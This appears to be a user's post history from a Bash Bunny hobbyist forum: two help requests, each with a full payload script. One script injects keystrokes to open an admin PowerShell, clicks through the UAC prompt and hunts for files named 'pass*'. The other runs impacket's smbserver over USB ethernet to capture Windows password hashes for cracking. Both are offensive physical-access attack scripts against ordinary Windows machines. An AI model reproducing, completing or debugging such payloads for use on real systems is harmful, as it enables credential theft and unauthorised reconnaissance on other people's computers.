Everything posted by A_SarcasticGuy

  1. So, I decided to try and write a script that can be used for recon, to find files with a specific phrase within their name and exfil the full path, file name and file size to the Bunny. However, when I try to run the script, it doesn't even create the directory to store the file in, and for some reason the LED blinks green...

         #!/bin/bash
         #Title: FileInfoExfiltrator
         #Author: A_SarcasticGuy
         #Version: 1.0
         #Target: Windows
         #Runs Powershell as Admin then scans (default "c:\") for all files beginning with a
         #specific phrase (default "pass*") and dumps the
         #full and relative paths and file size to a text file.
         LED B
         #Create dump directory
         LOOTDIR=/loot/exfil
         mkdir -p $LOOTDIR
         LED R
         #Source bunny_helpers.sh to source SWITCH_POSITION
         source bunny_helpers.sh
         ATTACKMODE HID STORAGE
         LED G
         #Launch Powershell as Admin
         Q GUI r
         Q DELAY 100
         Q STRING powershell Start-Process powershell -Verb RunAs
         Q ENTER
         #Bypass UAC
         Q DELAY 500
         Q ALT y
         Q ENTER
         Q DELAY 500
         LED B
         #Start p.bat
         Q STRING ".((gwmi win32_volume -f 'label='BashBunny''').Name+'payloads/'
         Q STRING $SWITCH_POSITION
         Q STRING '/p.bat')"
         Q ENTER
         #Wait for p.bat to finish
         LED R G B
         Q DELAY 3000
         Q STRING exit
         Q ENTER
         sync
         LED G

     The p.bat file works perfectly fine (or at least from what I can tell by testing it manually), it is just confusing as to why the LED is blinking green (I really have made sure that I have the right switch selected). Any ideas?
  2. Hello there! I was trying to combine the smbserver.py script from impacket and a ducky script to connect to the smb server automatically (the same script as is used for the rubber ducky apart from it connects to the IP of the Bunny) and pipe the result from the script to a file, which means the windows hashes will be saved in that file and saved to the Bunny, ready for cracking (I think?). However, whenever I try to run it, the Bunny seems to get caught up after running the server and I am assuming this is because the keyboard is still captured by the server, and if I were to add a: QUACK CTRL C after the server has run, it will stop the server (I assume). I used the following code to make sure that it wasn't an issue with my ducky script or anything else in the bunny script:

         #Run SMB Server and then connect to it in windows with the terminal output saved to a .txt
         LED B
         #HID is used to ensure that the ducky script can run (even though only a delay is included here)
         ATTACKMODE HID RNDIS_ETHERNET
         source bunny_helpers.sh
         #File path of the script, piping to file O.txt of same folder
         /pentest/impacket/examples/smbserver.py tmp /tmp/ >> O.txt
         #Potential QUACK CTRL C, if it doesn't stop the server
         QUACK DELAY 500
         #Check to make sure that the script continues after running the server
         LED R
         #The keyword parsed is always included at the start of the server, which would allow a check to be performed to ensure that the server is
         #running
         if grep parsed O.txt
         then
         LED R G B
         else
         LED R
         fi

     And the LED always remains blue, which assured me that it was getting caught at the running of the server. I even added a DELAY 500 to make sure it wasn't just that the grep was being performed before the file was populated. So, I was wondering if anyone has any idea of how to fix this issue? Whether it be use another script that will free the keyboard after running or use a stager payload of some sorts? Or maybe I am just being quite naive and missing something obvious!
Any help would be greatly appreciated! Yours Sincerely.